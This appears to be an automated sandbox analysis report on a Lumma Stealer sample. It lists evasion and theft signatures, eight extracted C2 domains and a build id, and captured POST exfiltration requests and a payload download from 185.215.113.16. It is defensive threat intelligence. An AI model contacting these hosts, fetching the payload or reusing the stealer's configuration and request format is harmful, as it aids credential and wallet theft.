Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543207
MD5: 84eeaf8b6dac33d7e5de9256769ca8c8
SHA1: eb1e3025548095128a6602d062d180192e7e88b1
SHA256: 58700ccf44cdd5f10ce7711543d93401dcd4e6328195173d25ffc6eba42bddc7
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: file.exe Avira: detected
Source: file.exe.1400.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "founpiuer.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "presticitpo.store", "crisiwarny.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe ReversingLabs: Detection: 36%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: scriptyprefej.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: navygenerayk.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: founpiuer.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: necklacedmny.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: thumbystriw.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: fadehairucw.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: crisiwarny.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: presticitpo.store
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.2257325876.0000000000821000.00000040.00000001.01000000.00000003.sdmp String decryptor: 4SD0y4--legendaryy
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000003.2276067053.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410192583.00000000003D2000.00000040.00000001.01000000.00000006.sdmp

Networking

Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49710 -> 104.21.95.91:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 104.21.95.91:443
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 27 Oct 2024 11:13:16 GMTContent-Type: application/octet-streamContent-Length: 2720768Last-Modified: Sun, 27 Oct 2024 10:07:55 GMTConnection: keep-aliveETag: "671e10fb-298400"Accept-Ranges: bytes
Source: Joe Sandbox View IP Address: 104.21.95.91
Source: Joe Sandbox View IP Address: 185.215.113.16
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49712 -> 185.215.113.16:80
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568574Host: crisiwarny.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crisiwarny.store
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/B
Source: file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.0000000001783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261446385.000000000133A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeM
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exev
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microP
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2110155391.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253655039.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109641062.0000000005E34000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2263039938.00000000017FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000003.2155306590.00000000017FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/0
Source: file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/5e9f
Source: file.exe, 00000000.00000003.2141585744.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142747663.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142625341.00000000017F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/Y
Source: file.exe, 00000000.00000003.2129448417.00000000017DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/a
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/alt-
Source: file.exe, file.exe, 00000000.00000003.2141625871.00000000017ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2083678993.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141499215.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253538805.00000000017E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253697863.00000000017ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/api3
Source: file.exe, 00000000.00000003.2124393205.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125805969.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2148529577.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129029760.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141448822.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127812697.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126194869.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126017190.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128672323.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127070717.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125616453.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128020421.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129262094.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126680781.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129756991.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253187496.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155177011.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124702808.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128238916.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2272666225.0000000005E39000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127372157.0000000005E39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiP-
Source: file.exe, 00000000.00000003.2155306590.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/apiu
Source: file.exe, 00000000.00000003.2124561103.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/r
Source: file.exe, 00000000.00000003.2111053218.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2110280342.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109706634.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109984852.00000000017FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store/t
Source: file.exe, 00000000.00000002.2262641819.00000000017CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253625013.00000000017C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crisiwarny.store:443/apiLE=user-PCUSERNAME=userUSERPROFILE=C:
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2111402565.0000000005E29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2084212152.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084274235.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084373731.0000000005DC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2111115009.00000000060BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name:
Source: 02FQBW3AYVFKS8DMY3O.exe.0.dr Static PE information: section name: .idata
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_017FC109 0_3_017FC109
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_0056FD3E 3_2_0056FD3E
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2224954459.0000000006304000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
